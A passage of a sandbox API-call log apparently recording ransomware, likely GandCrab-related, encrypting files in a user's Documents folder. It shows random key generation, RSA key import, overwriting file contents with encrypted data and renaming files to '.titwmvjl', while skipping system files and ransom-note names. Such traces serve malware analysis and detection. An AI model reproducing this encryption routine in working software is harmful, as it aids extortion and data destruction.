(lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\d2ca4a09d2ca4deb61a.lock") returned 108 [0089.945] lstrlenW (lpString=".lock") returned 5 [0089.945] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.945] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0089.945] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.945] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.946] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0089.946] lstrcmpW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2=".") returned 1 [0089.946] lstrcmpW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="..") returned 1 [0089.946] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="H2oUzN2O5wyQpegn.rtf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf" [0089.946] lstrlenW (lpString=".titwmvjl") returned 9 [0089.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf") returned 104 [0089.946] VirtualAlloc (lpAddress=0x0, dwSize=0x110, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.946] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf.titwmvjl") returned 113 [0089.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf") returned 104 [0089.946] lstrlenW (lpString=".rtf") returned 4 [0089.946] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.946] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".rtf ") returned 5 [0089.946] lstrcmpiW (lpString1=".rtf", lpString2=".titwmvjl") returned -1 [0089.946] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf") returned 104 [0089.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf") returned 104 [0089.946] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="desktop.ini") returned 1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="autorun.inf") returned 1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="ntuser.dat") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="iconcache.db") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="bootsect.bak") returned 1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="boot.ini") returned 1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="ntuser.dat.log") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="thumbs.db") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="KRAB-DECRYPT.html") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="CRAB-DECRYPT.html") returned 1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="ntldr") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="NTDETECT.COM") returned -1 [0089.947] lstrcmpiW (lpString1="H2oUzN2O5wyQpegn.rtf", lpString2="Bootfont.bin") returned 1 [0089.947] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf") returned 104 [0089.947] lstrlenW (lpString=".rtf") returned 4 [0089.947] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.947] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".rtf ") returned 5 [0089.947] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.947] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.947] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\h2ouzn2o5wyqpegn.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0089.948] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.948] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0089.948] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.949] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0089.950] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.950] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.950] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.950] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0089.950] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.950] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.950] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.951] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.951] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0089.952] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.952] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.952] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.952] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0089.952] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.952] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.952] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.952] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.953] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0089.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.954] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5037b8) returned 1 [0089.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.954] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0089.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.954] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0089.954] GetLastError () returned 0x0 [0089.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.954] CryptDestroyKey (hKey=0x5037b8) returned 1 [0089.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.955] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.955] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0089.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.956] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503638) returned 1 [0089.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.956] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0089.956] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.956] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0089.957] GetLastError () returned 0x0 [0089.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.957] CryptDestroyKey (hKey=0x503638) returned 1 [0089.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.957] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.957] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.957] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.957] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x10a6c, lpOverlapped=0x0) returned 1 [0089.964] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffef594, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.964] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10a6c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x10a6c, lpOverlapped=0x0) returned 1 [0089.965] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0089.967] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.971] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.971] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.972] CloseHandle (hObject=0x2cc) returned 1 [0089.972] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\h2ouzn2o5wyqpegn.rtf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\H2oUzN2O5wyQpegn.rtf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\h2ouzn2o5wyqpegn.rtf.titwmvjl"), dwFlags=0x1) returned 1 [0089.973] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.973] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0089.973] lstrcmpW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2=".") returned 1 [0089.973] lstrcmpW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="..") returned 1 [0089.973] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="jB1KmBPKOsPd5n.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx" [0089.973] lstrlenW (lpString=".titwmvjl") returned 9 [0089.973] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx") returned 103 [0089.973] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.973] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx.titwmvjl") returned 112 [0089.973] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx") returned 103 [0089.973] lstrlenW (lpString=".xlsx") returned 5 [0089.974] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.974] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".xlsx ") returned 6 [0089.974] lstrcmpiW (lpString1=".xlsx", lpString2=".titwmvjl") returned 1 [0089.974] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx") returned 103 [0089.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx") returned 103 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="desktop.ini") returned 1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="autorun.inf") returned 1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="ntuser.dat") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="iconcache.db") returned 1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="bootsect.bak") returned 1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="boot.ini") returned 1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="ntuser.dat.log") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="thumbs.db") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="CRAB-DECRYPT.html") returned 1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="ntldr") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="NTDETECT.COM") returned -1 [0089.974] lstrcmpiW (lpString1="jB1KmBPKOsPd5n.xlsx", lpString2="Bootfont.bin") returned 1 [0089.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx") returned 103 [0089.974] lstrlenW (lpString=".xlsx") returned 5 [0089.974] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.974] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0089.975] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.975] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.975] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\jB1KmBPKOsPd5n.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\jb1kmbpkospd5n.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0089.975] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.975] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0089.976] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.976] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.976] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0089.977] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.977] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.978] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.978] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0089.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.978] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.978] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.978] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.978] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0089.979] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.980] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.980] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.980] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0089.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.980] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.980] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.980] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0089.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.982] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5038f8) returned 1 [0089.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.982] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0089.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.982] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0089.982] GetLastError () returned 0x0 [0089.982] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.982] CryptDestroyKey (hKey=0x5038f8) returned 1 [0089.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.983] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.983] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0089.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.984] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5032f8) returned 1 [0089.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.984] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0089.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.984] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0089.985] GetLastError () returned 0x0 [0089.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.985] CryptDestroyKey (hKey=0x5032f8) returned 1 [0089.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.985] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.985] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.985] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.985] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x604a, lpOverlapped=0x0) returned 1 [0089.991] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffff9fb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.991] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x604a, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x604a, lpOverlapped=0x0) returned 1 [0089.992] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0089.993] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.999] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.999] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.999] CloseHandle (hObject=0x2cc) returned 1 [0090.000] MoveFileExW 